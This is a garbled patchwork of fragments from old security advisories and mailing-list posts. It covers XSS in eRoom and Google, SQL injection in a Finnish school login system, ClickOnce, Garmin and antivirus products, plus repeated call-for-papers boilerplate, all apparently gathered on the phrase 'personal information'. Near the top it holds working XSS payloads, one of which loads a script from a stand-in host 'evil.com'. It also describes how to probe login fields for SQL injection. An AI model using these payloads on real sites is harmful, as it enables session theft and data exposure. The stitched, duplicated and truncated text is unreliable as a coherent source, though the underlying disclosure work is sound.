personal information
1. Do not disclose any aspect of the vulnerability to ANYONE until
you have formally notified the leadership of the company
(The company will provide you with disclosure guidelines after
they have been formally notified)
2. Research the state and federal statues related to the protection
of personal information and breach notification
(Take special notice if you fall under special regulations like
HIPAA or SOX)
3. Create a document to present to the company leadership:
. a. Prepare a complete analysis of the vulnerability including the
exact steps needed to repeat the exploit
file."><script>alert(1)</script>
."><script src="http://evil&#x2e;com/evil%2ejs"></script>
."><script src="/eRoomReq/Files/facility/eRoom/0_f000/test%2etxt"></script>
2) Permanent Cross-Site Scripting within the personal information
Users can change their personal information. By editing the field
"organization" it is possible to store a malicious JavaScript payload
(e.g., <script>alert(1)</script>).
The payload gets executed every time a user visits a part of the website
responsible for alerting users about changes in the eRoom (i.e., "Choose
Impact: high
Found: months ago
The login screens of the school administration database system, "login.asp" and "inloggning.asp", as used in an unnammed school district in Finland, contain SQL injection vulnerabilities, which can be easily detected by inserting '||' (the oracle string concatenation operator and ending and starting quotes) within a valid password or username (they still work), or adding an odd number of quotes (resulting in an exception). The "input validation" in JavaScript must be "defeated" first - there is no signs of any validation done server side.
The program also contains other SQL injection vulnerabilities in text fields etc. accessible after login - especially ones that are used to search for information, which may allow compromise of sensitive personal information in the database via injection to a SELECT query.
The program prints exception handlers to the browser, including Oracle database error strings.
The session cookie lacks the 'secure' flag, and if a logged-in user clicks a link with the http: scheme (such links exist in the school district's web pages) the cookie will be sent in plain text.
Privacy Theme
-------------
Privacy concerns the operational policies, procedures and regulations
implemented within an information system to control for the unauthorized
use of, access to, or release of personal information held in any format.
Topics of interest in this theme include (but are not limited to):
* privacy preserving/enhancing technologies
* identity management and biometrics
* privacy and ubiquitous computing, e.g. RFIDs
- Create a new page
Because these modules' input variables are not adequately checked and
filtered, hacker might insert his code into the path's links. If a user
logins to his Blog and clicks the link, hacker's malicious code (JavaScript)
will be executed, leading to the loss of user's personal information saved
on the browser.
CSRF vulnerabilities are found on the following modules:
- Edit an user
- Setting
> Impact: high
> Found: months ago
>
> The login screens of the school administration database system, "login.asp" and "inloggning.asp", as used in an unnammed school district in Finland, contain SQL injection vulnerabilities, which can be easily detected by inserting '||' (the oracle string concatenation operator and ending and starting quotes) within a valid password or username (they still work), or adding an odd number of quotes (resulting in an exception). The "input validation" in JavaScript must be "defeated" first - there is no signs of any validation done server side.
>
> The program also contains other SQL injection vulnerabilities in text fields etc. accessible after login - especially ones that are used to search for information, which may allow compromise of sensitive personal information in the database via injection to a SELECT query.
>
> The program prints exception handlers to the browser, including Oracle database error strings.
>
> The session cookie lacks the 'secure' flag, and if a logged-in user clicks a link with the http: scheme (such links exist in the school district's web pages) the cookie will be sent in plain text.
>
Reported: 11 October 2007
Occured: 02 October 2007
Incident Type: Vulnerability Disclosure
WASC Threat Classification: Insufficient Authorization
Personal information on anyone who worked or volunteered for the
Pembroke schools in the last four years was accessible via the Internet
because of a weakness in the district's computer system. The
information, including names, birth dates and Social Security numbers,
was available from May until Oct. 2, when school officials learned of
the problem.
http://www.q2solutions.com.au/
"ConnX is a ready built internet/intranet solution that empowers employees and
management to view and update HR and Payroll information. Internal
communications
are improved by providing easy access to Company and personal information for
all employees."
Versions tested:
Version 4.0.20080606 has been confirmed as vulnerable. Other versions untested.
Nam
On 9 May 2009 02:03:15 -0000
Inferno@SecureThoughts.com wrote:
> Universal XSS Vulnerability in all Google Services can compromise your personal information
> May 8th, 2009
>
> Vulnerability Reported: 04/18/2009 9.33 pm
> Google’s Response: 04/18/2009 10.19 pm (Wow! that was super fast for Saturday :))
> Vulnerability Fixed: 05/05/2009 7.05 pm
Universal XSS Vulnerability in all Google Services can compromise your personal information
May 8th, 2009
Vulnerability Reported: 04/18/2009 9.33 pm
Google’s Response: 04/18/2009 10.19 pm (Wow! that was super fast for Saturday :))
Vulnerability Fixed: 05/05/2009 7.05 pm
Change Propogated: 05/07/2009 3.19 pm
I recently reported a cross-scripting flaw to Google, which is now fixed. The vulnerability existed in Google’s Support Python Script where a malicious url is not sanitized for XSS character ‘ (single quote) before putting inside javascript variable logURL. As a result, it was possible to break the encapsulation of the var declaration and execute arbitary javascript commands on the main Google.com domain.
This can be exploited to bypass the domain locking and dialog box
presented to the user asking for confirmation that the untrusted site
may access private data.
Successful exploitation allows full access (such as deleting data,
retrieving personal information, or installing firmware updates) to
any Garmin GPS products connected to the user's system.
======================================================================
5) Solution
1) Introduction
===============
Rising Firewall 2009
RISING Firewall is a customizable personal information security product designed to protect your computer from attacks while online.
(from Rising Firewall website)
#####################################################################################
[Snip..]
I. Background
~~~~~~~~~~~~~
I. Background
Quote:"Trend Micro Incorporated is a global leader in network antivirus and Internet content security software and services. Founded in 1988, Trend Micro was a pioneer in secure content and threat management, leading the migration of early virus protection from the desktop to the network server and the Internet gateway. Today, the company continues to advance its comprehensive approach to management of content security threats into the Internet cloud, encompassing information flow beyond the boundaries of the network. With its 24x7 global support operations and dedication to innovative technologies and methodologies, Trend Micro is well positioned to protect its customers against an expanding range of threats that silently endanger business operations, personal information, and property."
Privacy Theme
-------------
Privacy concerns the operational policies, procedures and regulations
implemented within an information system to control for the unauthorized
use of, access to, or release of personal information held in any format.
Topics of interest in this theme include (but are not limited to):
* privacy preserving/enhancing technologies
* identity management and biometrics
* privacy and ubiquitous computing, e.g. RFIDs
location and as requested in the application manifest).
If no elevated permissions are requested, the application is launched
without any warning dialog. Instead the .NET Framework presents a
warning message in which users are warned not to enter personal
information or passwords in the displayed window unless they trust its
source (see figure below).
http://www.akitasecurity.nl/advisory/AK20100601/003-clickonce_internet_zone_warning.png
Figure 3: Security warning for applications running in the Internet
zone.
Privacy Theme
-------------
Privacy concerns the operational policies, procedures and regulations
implemented within an information system to control for the unauthorized
use of, access to, or release of personal information held in any format.
Topics of interest in this theme include (but are not limited to):
* privacy preserving/enhancing technologies
* identity management and biometrics
* privacy and ubiquitous computing, e.g. RFIDs
Commenting, favorites and the ability to view the favorites of the people you follow.
CVE and OSVDB integration
Privacy settings for all personal information
You can send messages to other users
You can switch to a minimal listing view
|
